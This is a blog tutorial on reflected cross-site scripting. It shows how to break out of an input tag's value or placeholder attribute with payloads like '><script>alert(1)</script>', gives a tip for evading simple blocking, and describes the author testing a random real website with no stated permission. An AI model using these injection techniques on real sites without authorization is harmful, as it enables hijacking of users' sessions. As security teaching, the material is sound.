Cross Site Scripting - Level 1 __ Frozen Flame
May 31, 2021
Close it first; then exploit
Hello everyone. Welcome back in another tutorial of XSS or, Cross Site Scripting Attack. In my 1st tutorial, we have talked about, level 0 or, beginner level attacking vectors. But, you won't get that type in any bug bounty programme. Or, you may get but, pretty rarely. That's why this time, I will increase the level. Let's go for level - 1. If you haven't read my 1st blog yet, then I will request you to read that first. Then, come to read this blog. Or, you may not understand what I am doing.
So, one day I was searching in a website randomly. And I couldn't resist myself from testing the XSS attack in that particular website. 😁 And luckily I found it also. So, I thought why don't I share this thing with you? But, like the previous one, I won't share the domain or, any kind of information about that website. Without further ado, let's exploit..
Exploitation ::
Our domain looked like, everythingvuln1.com . And, like the previous one, I found a search box. I searched for a random thing. Just like,
testingxss
And, I found a URL like ,
everythingvuln1.com/search.php?query=testingxss
Checking the source code ::
Now, I have to find if my randomly searched strings can be found in the client side source code. After searching in the source code I got this,
<input type="text" name="query" value=testingxss>
Ok. So, the input tag's value, holds the searched query. As I percept, we have a chance to perform a successful Cross Site Scripting attack.
Choosing the correct payload ::
Bug bounty is like a war. And we have to choose a correct weapon for wining the war. And, here, we have to choose the correct payload. Well, if I give the normal payload here, it won't work. Why? Ok. Let me show you the reason. If we search with the most common payload like this ,
<script>alert(1)</script>
Then our URL will be like this right?
<input type="text" name="query" value=<script>alert(1)</script>>
As you can see, it didn't executed. Because, the 1st part of our payload, becomes the value of a tag. So, at first, we have to make it out of the tag. And, for doing this, we have to close the tag first. And, then we have to execute our tag. Every tag closes with an greater than symbol ( > ) . So, our payload should be like,
- Close the tag with the angle bracket ( > )
- Then, execute the payload .
So, our final payload will look like this,
<input type="text" name="query" value=><script>alert(1)</script>>
Many will ask, " what about the last angle bracket ( > ) ?? " Actually it can't do anything. And, it won't stop our payload from getting executed in the webpage. But, if you want, you may comment the last angle bracket or, end that like this, ><script>alert(1)</script>< . So, our final payload is,
><script>alert(1)</script> or,
><script>alert(1)</script><
I searched this payload in that particular website's searchbox and, it was what we expected. A successful attack of Cross Site Scripting .
Some same scenario ::
Scene (1)
Source Code -
<input type="text" name="query" value='testingxss'>
Payload -
'><script>alert(1)</script>
Successful attack -
<input type="text" name="query" value=''><script>alert(1)</script>'>
Scene (2)
Source Code -
<input type="text" name="query" value="testingxss">
Payload -
"><script>alert(1)</script>
Successful attack -
<input type="text" name="query" value=""><script>alert(1)</script>">
Scene (3)
Source Code -
<input type="text" name="query" placeholder="testingxss">
Payload -
"><script>alert(1)</script>
Successful Attack -
<input type="text" name="query" placeholder=""><script>alert(1)</script>
Note ::
Sometime, you may get blocked if you run like this,
- value=''><script>alert(1)</script> or,
- value=""><script>alert(1)</script>
So, try to put some value before you close the tag with single quote or, double quote so that, there is some characters between the quotations. And your query will be ok to go. 👻
That's a for today. If I get good response from you , I will write more blogs about Cros Site Scripting attack. Till then,
Happy Hacking. 💓💡